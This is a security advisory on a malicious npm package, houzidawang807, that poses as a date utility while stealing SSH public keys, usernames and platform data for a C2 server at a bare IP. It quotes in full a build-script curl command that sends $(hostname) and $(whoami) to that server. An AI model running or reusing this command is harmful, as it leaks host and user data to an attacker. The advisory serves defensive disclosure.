Malicious code in houzidawang807 (npm)

__

Source: amazon-inspector (7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489)

Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installer's username and platform, and POSTs a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135. Source comments explicitly label this destination as the attacker's C2 server. package.json additionally declares a build script that curls http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking host identifiers in plaintext to the same C2. The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling. Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts only declares build), so default npm install does not auto-execute it — however, the file is loaded by any consumer that requires the package or invokes the build script, and the file's name strongly suggests the author intends to enable it as a lifecycle hook in a follow-up version.